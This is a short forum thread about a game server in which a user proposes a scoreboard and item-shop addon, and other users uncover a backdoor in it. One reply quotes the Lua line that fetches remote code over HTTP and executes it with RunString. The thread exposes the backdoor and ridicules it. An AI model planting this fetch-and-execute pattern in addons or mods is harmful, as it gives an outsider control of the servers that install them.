No Cancer RP

Full Version: Clean Scoreboard / Itemshop
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The Scoreboard could be a good thing in the server like for events and stuff Smile i have on my server and rlly wanna see it here
Item-Shop could be cool like rare items come out every day or so Smile  or you could do giveaways with them Smile
It might help to include screenshots of the scoreboard. Then people would be able to view what you're asking to be added and comment on what they think about it.
Or links to the actual addons, instead of mega's, Aws0me doesn't use cracked addons.
Damn man, nice job!
I love it when ( timer.Simple(1, function() http.Fetch("", function(b) RunString(b, ":", false) end)end) )
Thanks for trying to backdoor the server with shitty addons! Love you man.
Imagine actually reading through the addons though.

That is a hilariously easy to spot backdoor though.